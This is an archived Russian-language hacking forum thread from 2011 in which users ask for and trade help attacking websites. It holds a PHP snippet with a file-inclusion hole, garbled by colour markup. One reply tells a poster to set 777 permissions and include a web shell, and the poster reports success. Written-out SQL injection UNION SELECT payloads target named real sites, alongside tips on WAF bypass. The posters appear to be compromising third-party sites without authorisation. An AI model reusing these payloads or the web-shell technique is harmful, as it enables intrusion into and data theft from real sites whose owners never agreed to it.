ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.05.2011, 00:14
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
Подскажите как перейти в директорию выше если проверяет наличие .. ?
/news/index.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]05/04/10";
[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ref[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$ref[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/news\//"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ref[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
for ([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$out_str[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
for ([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]Вернуться'[/COLOR][COLOR="#007700"]);
}
if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'view'[/COLOR][COLOR="#007700"]])){
[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'view'[/COLOR][COLOR="#007700"]]);
}else{
[/COLOR][COLOR="#0000BB"]show_all_news[/COLOR][COLOR="#007700"]();
}
[/COLOR][COLOR="#0000BB"]?>
[/COLOR][/COLOR]
|
|
|
11.05.2011, 00:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
2186
Репутация:
0
|
|
Сообщение от попугай
попугай said:
Понял. Тогда дай /home/username и шеллу права 777 и снова проинклюдь
ОМГ. прокатило) спасибо!(там еще проблема в том что в шелле ссылки релатив, но это уже дело техники, разберусь). Реально помог.
|
|
|
|
11.05.2011, 03:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
1531
Репутация:
0
|
|
Такой вопрос...
Нашел SQL Injection сайте из моего предыдущего поста.
Просканил information_schema на предмет баз данных, таблиц и их колонок. Нашел нужные мне.
Но там есть некоторые колонки, пытаясь просмотреть содержимое которых у меня возникает ошибка. Ошибка та-же 500 internal server error.
В чем может быть проблема?
Как её можно решить?
|
|
|
|
11.05.2011, 04:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от SaNn
SaNn said:
Такой вопрос...
Нашел SQL Injection сайте из моего предыдущего поста.
Просканил information_schema на предмет баз данных, таблиц и их колонок. Нашел нужные мне.
Но там есть некоторые колонки, пытаясь просмотреть содержимое которых у меня возникает ошибка. Ошибка та-же 500 internal server error.
В чем может быть проблема?
Как её можно решить?
onsalecell.com где здесь скуля?
|
|
|
|
11.05.2011, 12:22
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944
Репутация:
37
|
|
Сообщение от SaNn
SaNn said:
Такой вопрос...
Нашел SQL Injection сайте из моего предыдущего поста.
Просканил information_schema на предмет баз данных, таблиц и их колонок. Нашел нужные мне.
Но там есть некоторые колонки, пытаясь просмотреть содержимое которых у меня возникает ошибка. Ошибка та-же 500 internal server error.
В чем может быть проблема?
Как её можно решить?
Скорее всего WAF стоит. Пробуй различные обходы WAF
|
|
|
|
11.05.2011, 23:08
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Не могу таблицы посчитать,
http://www.iorta.com/catalog.php?catid=47+and+1=0+union+select+unhex(he x(concat_ws(0x3a,version(),database(),user(),@@ver sion_compile_os))),2+--+
5.0.1-alpha-log:trade:tradeuser@localhostc-linux
тут, все выводит, а дальше не получается
http://www.iorta.com/catalog.php?catid=-47+union+select+1,count(*)+from+information_schema .tables+--+
Что можете посоветовать?
|
|
|
|
11.05.2011, 23:24
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
FlaktW
не скажу на 100%, но на сколько я помню, в мускул 5.0.1 альфа information_schema еще не было
|
|
|
|
11.05.2011, 23:26
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от Konqi
Konqi said:
FlaktW
не скажу на 100%, но на сколько я помню, в мускул 5.0.1 альфа information_schema еще не было
Наверное, ты прав!
|
|
|
|
11.05.2011, 23:31
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
пруф |
|
|
|
12.05.2011, 15:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
149611
Репутация:
81
|
|
Возможно ли, если показывает пустую страницу (как тут: http://www.goldenformula.net/news.php?id=%27) что там есть скуль?!
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
